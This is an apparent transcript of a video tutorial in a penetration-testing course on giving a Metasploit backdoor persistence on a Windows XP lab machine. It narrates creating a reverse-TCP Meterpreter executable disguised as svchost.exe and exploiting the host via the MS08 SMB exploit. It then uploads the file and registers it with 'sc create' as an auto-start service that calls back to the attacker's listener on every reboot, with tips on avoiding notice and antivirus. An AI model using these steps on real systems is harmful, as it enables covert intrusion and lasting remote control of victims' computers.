Alright, so in this video I want to try to move as quickly as I can, but it's going to be probably pretty lengthy. We're going to do a lot of stuff in this video, but it's going to be pretty cool. Hopefully it makes you think a little bit, you can brainstorm a little bit, get creative with it if you want. But basically what we're going to try and do is we're going to generate a payload using MSF payload. We could encode it if we want to, but just for the demonstration of the video, we're just going to generate the payload just to demonstrate how it works. We're going to upload it whatever method we want, whether the user, the victim downloads it, or we exploit the machine and upload it to it, however you want to do it. We need to get it onto the system. Once it's compromised, we're going to get a shell. We're going to create a service, and this way, every time that the machine restarts, it will call back to our Metasploit. So the other way that it happens is that obviously the user would double click on our payload, our exe, and then it would create the session. Well, in this case, the user doesn't have to click on it. We're going to automatically put it on there, either maybe with or without them knowing it, depending on if they downloaded it or if we kind of snuck in there and put it on there. There's so many different scenarios that we can use this on. So let's go ahead and get started with it. I'm going to go ahead and just do let's actually create a payloads folder or a backdoors folder, and I'm going to go ahead and do an ls. And so what I need to do is I'm going to do an mkdir. This is make directory, and we'll just name it backdoors. Do an ls, and we can see that backdoors has been created. So now that that's been created, I'm going to go ahead and cd backdoors. And now we're in there, and of course do an ls, there's nothing in there. So now that we're in the folder, we're going to go ahead and do an msf payload. We're going to use a windows/meterpreter /reverse TCP, and we need to set our lhost equals 192, whatever your IP address is on your Kali machine. Our lport equals, I'm going to do all 8s on mine. This is optional, but if you want to follow along, just do all 8s. And a capital X, which means we're going to create an exe, and we're going to do a greater than sign and a file name. Now here's where you get creative. What I'm planning on doing is taking this exe and then creating a service out of it. So the service will run this every time that the machine starts. So obviously, if I'm going to do this, I need to come up with something that's not going to be noticeable. So obviously, if we named it Trojan or backdoor, well, if somebody sees that, it's going to be pretty obvious. So one thing that I'm going to pick is XP or whatever Windows OS. It's going to run the SVC host, the service host, and it runs all kinds of different services. Now it runs that exe out of the system32 folder. Now one thing that we can't do is we cannot replace that exe. So we've tried to bundle our payloads with that exe and then override it, upload it. It doesn't work. Windows automatically will any kind of changes that are made to the SVC host, it will overwrite that file and recreate it. So we can't actually do that. But what we can do is svchost.exe, and we're just going to put it in a different location. So if somebody pulled up the process, they're going to see SVC host, and so it shouldn't be too alarming. And so I'm going to go ahead and just hit enter. So I hope all that makes sense. I'm trying to be as thorough as I can so that it makes sense. And what I'm going to actually do, my battery's getting low here, so we'll try and make good time with this. One thing that we're going to try to do is let's just try and be sneaky about it. Now we could use, for example, the PDF exploit or the payload that we used before, the malicious PDF. We can use that. We can use a different payload that's on the system. Any way that we can get onto the system, that's what we want to do. Of course, we could also have the user download our svchost.exe. That would be nice, but we're going to kind of make it a little bit more of a challenge. I kind of like that. So I'm going to do an ls, and we can see our svchost.exe is created. And of course, we could have encoded it and all that. We can maybe do that in just a future video and just generically just encode random payloads and so forth. So let's go ahead and fire up our MSF console, which I have one open here. And I'm going to go ahead and just exploit the system. So I'm going to use the exploit Windows SMB MS08. Again, this is just how I'm doing it. You can do it a different way if you like. Show options. I'm going to set G for our host. That way I don't have to keep typing this in. 192.168.1.106 is the victim. And the payload, Windows interpreter, let's see, I hit tab, let's see, there we go. Interpreter, reverse, TCP, and I'm going to set GL host, which if you don't remember, G is global. So any payload or anything that we do in the future, the value for our host, no matter what exploit or what payload, it's always going to be 192.168.1.106. So our L host, we're going to do the same thing. 192.168 as far as global, set G. .1.101. Show options. We're on port 4444. That's fine. I'm going to exploit this. Okay, now that we have our interpreter session, let's get UID just to see what we are. We're NT System Authority, so that's fine. And let's just do a get PID. We're process 1104. Let's do a PS. What is 1104? We are SVC host, and it's running as NT Authority. And you can see that's running out of Windows System 32 SVC host. And you'll see a bunch of other SVC hosts on here. Here's another one here. Again, System 32. System 32. So you see it's running multiple times. So all we're going to do is we're going to run it just in a different location. So let's go ahead and do that. We need to upload this to the system. So we're going to upload /root/backdoors. Remember we created that backdoors folder, and I just hit tab and it automatically filled it out for me. And what we're going to do is we're going to upload this to C:\\, Windows, another couple backslashes there, and that's fine. We're going to leave it just there. And it uploaded it, which is perfect. So now it should be in the Windows folder. So at this point, it's not going to do anything. It's sitting in the Windows folder. The user probably will never find it and click on it. So we're going to go ahead and try and use this as a service. So at this point, we need to drop into a shell, and we're going to be using some command prompt skills. And I'm just going to do a shell. We're already NT System Authority, so if we just drop into a shell, we'll maintain those privileges as NT Authority. So when we do the execute -f cmd.exe and so forth, the -c and then the -H, that is creating a channel but with the privileges that we currently are. So like let's say that we came in as researcher. Well, if I dropped a shell, we would have the same privileges as researcher. But if I can launch the execute cmd and so forth, then it would launch it as NT Authority system. It would be the same thing as if you went into Windows, you right-clicked on the command prompt, and then you launched it as administrator. Kind of the same idea. But since we're already NT Authority system, we should already have those privileges, so I'm just going to use the shell. Of course, if you want to use the other one, you're more than welcome to. So now if you remember before, when we were talking about services, we used a lot of the scqueryx commands. We did a net stop command to try and stop services. Well, there's another sc command that we can use to create a service. And if I do sc create, there's a few things that we need. If I just hit enter, let's see what it does. It tells us what we need. And some of this might look a little bit familiar. We have a start equals, and if you remember, we did a start equals disabled to disable the service. We're going to need the bin path. We're going to definitely use the bin path. We'll probably use the start and also the display name, because the service will have the service name and it's also going to have the display name. So I'm just going to set those parameters. So sc create the name of the service that we want to create. Now on the XP machine, you know what, for the heck of it, I'm just going to do a task list /svc. Now we're kind of going off topic here, but the SVC host, you see there is no service called SVC host. It's running, for example, LM host, remote registry. Here's all the actual name of the services that it's running. But if we try and look for SVC host as a service, I don't see it. But it's using the process a whole bunch. But I don't actually see the service name as SVC host. So I'm just going to pick that. So let's do a sc create SVC host. And we need to do the bin path. Bin path equals, this is very important. If we type in something here, it's not going to work. We need to do a space after the equal sign. And where did we put this file? We put it in C:\\Windows/ and svchost.exe. The next thing that I'm going to do is start equals, put that space there, and we're going to do auto. It can be auto, it could be manual, but we're going to put it on auto. Oops, let me go back down here. Auto, so that it automatically will start when the service or when the machine reboots. The last thing I'm going to do is display name. Now display name, you have to use a capital D and a capital M, and it's all one word. And we're going to do an equals and then the name of the service name. So we can actually give the display name a different one. And so we'll name it SVC H with a 0, just because we'll try and look at it later on. Obviously we could just do SVC host and that would look normal, but just because I'm doing it, I'm going to put a 0 so we can identify it later, which we should already be able to identify because there's no other services named SVC host. But anyways, just go along with it. Okay, so this is going to create a service SVC host, and it's also going to make additions to the registry, which is nice. Now the next thing that I'm going to show you after this video is a Metasploit persistence way of doing this, which would actually create a virtual or a Visual Basic script, and that flags the antivirus all the time. Now it goes and it makes changes to the registry and everything so that it does it on startup and everything, but the creating of the Visual Basic script and then throwing it in the temp folder, which is what it does, and then creates all this stuff, it flags the antivirus. Well, by doing it this way in the command prompt, I'm the user setting up a service, so we're not creating a Visual Basic script to do this. So this could be definitely beneficial to know. Anyways, let's go ahead and move on. I'm going to go ahead and hit enter, and it says if everything was correct, create service, it was a success. Man, that's awesome. So we're going to go ahead, there's no need to be in the shell anymore. I'm going to exit the shell. And now what I need to do is I'm going to go ahead and open up another MSF console. You'll see why here in a second. To test this, I'm going to reboot the machine. But I need to have my handler running so that when it reboots, I can catch the session. Otherwise, I might miss it. So give it just a few more seconds here to start that MSF console. Alright, and it started. So we're going to use exploit multi. Oops, gotta wait for it. There it is. Handler. And we need to set the L port because if you remember, our payload for our L port is 8888. So when this payload goes to launch, I need to be listening on 8888 or I'm not going to get it. Set L port 8888. Show options. And it's not in there, but if I hit run, it should run on port 8888. So I'm going to go ahead and hit run. Let's make sure that it actually does what I said it would do. There we go. And it's running on 8888. Let me go back to this one, and now I'm going to reboot the machine just for demonstration purposes. So as this is rebooting, we actually can get out of this interpreter session because we're going to lose it anyways. And let's see what's going on over here. Is it not rebooting? Oh, there it goes. It's rebooting now. So I'm going to go ahead and exit this because as soon as it reboots, we're not going to have that session anymore anyways. So I'm going to jump back over here, and we're just going to sit here and wait. Let's click back over here. It's still shutting down. There it goes. Here we go. We'll wait for the 10-year boot process again. Alright, so now I'm not going to log in. I'm going to let it sit here. Let's jump over here. Now what's going to happen is it's going to run this payload, but it's like an empty process. There we go. Sending stage. Let's see if we can actually get the session. There we go. And come on, give us the interpreter session. There we go, we got it. I need to do a PS, and it doesn't do anything. Let me do a get UID. There we go, we're NT System Authority. Let me do PS again. There we go. I need to migrate as fast as I can, just because I don't like sitting here. This one right here, 916. Migrate to 916. Oh, there we go. You see how it died? It died. So when this happens, let me go ahead and hit enter here. Let me rerun this, and I'm going to restart this here, the XP machine, which we could technically re-exploit it, but just for demonstration we'll restart it. Basically the payload, it's an empty process. So you remember how before, like when we migrate away from it, it shuts down the process? Well, when it goes to start this service, nothing's really happening. So I believe what's happening is the service will eventually stop. It'll give us our payload, but we need to move away from that service as quickly as possible. And as long as we can do that fairly quickly, we should have no issues with getting safe after that. So we'll just wait for this again to shut down. Here it goes. Alright, looks like it's booting in, and it's going to be a race. So come on now. There we go. As soon as I see this go, I'm going to do a PS, and I'm going to try to migrate as quickly as possible. And once we are able to migrate, here we go. Once we're able to migrate, then we should be safe. And the process can die. Let's do a PS. There we go. Migrate. I'm going to go ahead and migrate to 908. See if we can get over there in time. And are we going to get it? Are we going to get it? There we go. Sweet.